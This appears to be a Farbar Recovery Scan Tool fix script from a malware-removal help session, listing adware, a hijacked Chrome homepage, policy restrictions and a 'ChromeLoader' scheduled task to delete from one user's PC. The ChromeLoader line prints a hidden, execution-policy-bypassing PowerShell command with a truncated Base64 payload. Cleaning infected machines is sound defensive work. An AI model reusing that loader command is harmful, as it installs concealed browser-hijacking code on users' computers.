CreateRestorePoint:
CloseProcesses:
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction
HKLM\SOFTWARE\Policies\Google: Restriction
Task: {BCFD0FC1-48CF-40A2-B4F8-53BA5EBD8CF5} - System32\Tasks\ChromeLoader => cmd /c start /min "" powershell -ExecutionPolicy Bypass -WindowStyle Hidden -E JABlAHgAdABQAGEAdABoACAAPQAgACIAJAAoACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQApAFwAYwBoAHIAbwBtAGUAIgAKACQAYwBvAG4AZgBQAGEAdABoACAAPQAgACIAJABlAHgAdABQAGEAdABoAFwAYwBvAG4AZgAuAGoAcwAiAAoAJABhAHIAYwBoAGkAdgBlAE4AYQBtAGUAI (l'élément de données a 4315 caractères en plus).
S2 SecurityService; C:\Program Files (x86)\TotalAV\SecurityService.exe [264032 2021-11-09] (Protected Antivirus Limited -> TotalAV)
R1 webshieldfilter; C:\Windows\System32\drivers\webshieldfilter.sys [96264 2021-11-09] (Microsoft Windows Hardware Compatibility Publisher -> Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (Pas de fichier)
HKU\S-1-5-21-1386259266-836039534-2927133994-1001\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe --minimize (Pas de fichier)
Task: {0095FA72-A416-458A-BDB2-7442D170C6CD} - System32\Tasks\Opera scheduled Autoupdate 1637158177 => C:\Users\Sapnas\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
Task: {A390320C-E533-479C-AEB7-0941C6F6F71F} - System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1386259266-836039534-2927133994-500 => C:\Users\Sapnas\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe (Pas de fichier)
Task: {A6E6B4A9-F4D7-4341-9D43-A24EF343474A} - System32\Tasks\PC Cleaner automatic scan and notifications => C:\Program Files (x86)\PC Cleaner\PCCNotifications.exe (Pas de fichier)
Task: {E54C31FB-E255-4704-9139-858428A47613} - System32\Tasks\Opera scheduled Autoupdate 1638040950 => C:\Users\Sapnas\AppData\Local\Programs\Opera\launcher.exe --scheduledautoupdate $(Arg0) (Pas de fichier)
S2 Wallpaper Engine Service; "C:\Users\Sapnas\OneDrive\Bureau\Wallpaper Engine\bin\wallpaperservice32_c.exe" [X]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [10304]
SearchScopes: HKU\S-1-5-21-1386259266-836039534-2927133994-1001 -> DefaultScope {BAF72C54-BB04-4E7A-9220-288FDBCE2923} URL =
FirewallRules: [{BFB12879-FFA2-42CB-8EA0-DDA29E8B077D}] => (Allow) C:\Users\Sapnas\AppData\Local\Programs\Opera\81.0.4196.54\opera.exe => Pas de fichier
FirewallRules: [{1FA1DA51-E1D0-47DF-A597-71607DF1B1EE}] => (Allow) C:\Program Files\NewBlueFX\VegasStream\VEGAS Stream.exe => Pas de fichier
FirewallRules: [{1B4CB410-FDB3-4752-993E-C0EA2671BE90}] => (Allow) C:\Program Files\NewBlueFX\TitlerLive\TitlerLiveStandalone.exe => Pas de fichier
FirewallRules: [{D2D756B6-2602-4C68-A03F-16B2FF4503CD}] => (Allow) C:\Program Files\NewBlueFX\Common\EffectHost64.exe => Pas de fichier
FirewallRules: [{1B429766-7BF9-46F7-A979-C03D12F5BF71}] => (Allow) C:\Users\Sapnas\AppData\Local\Programs\Opera\81.0.4196.60\opera.exe => Pas de fichier
C:\Windows\system32\Tasks\PC Cleaner automatic scan and notifications
2021-12-15 13:08 - 2021-12-15 13:17 - 000000000 ____D C:\ProgramData\PC Cleaner
2021-12-15 13:04 - 2021-12-15 13:05 - 006780568 _____ (PC Helpsoft ) C:\Users\Sapnas\Downloads\PC_Cleaner.exe
CHR HomePage: Default -> hxxps://fr.search.yahoo.com/yhs/web?hspart=omr&hsimp=yhs-001&type=88fptxqjxp1acegikmwv4002320&param1=y6bdVFVIsvuYsgEClQfz8Gt8Oby4iBdjLq7%2Fysk4Phe5sV980wpeWqTlm5o9JII7F5WVzyh7Xaojy%2BWN%2B9EtjqXiBezc%2BW8YlKiUzim9pRwmuLNk5kuD9qwmuk%2F2qnz8Vq%2BXskLMekdpf2pB8ndwFpqi%2FiDlor0rj15tIYLZCXFjQuiNErUAT1O2mOAGRRRo2qA1w3Y750fcZXpJlNAudL67nCpH8aJ4LwqhQx4B2hM%2FKckbjZR5MidsOMdeRckSVkkqs4fwIR1yYbrX8M3V0kMKdeo7Qcgta%2BUkDDLrBV162AlpPZTG7n5hUkWAI5dgBofubX1tBNdVMpTH7j%2FGJaiNOb96Nac2t3Kb%2BX0TiE2YWfDT8SV3Gg3zZkSB90a5IuuyJ0aFZ0JUzOOZBVipAg%3D%3D
C:\Windows\nl.exe
C:\Users\Sapnas\Downloads\Multi FH5 (1).rar
Hosts:
EmptyTemp: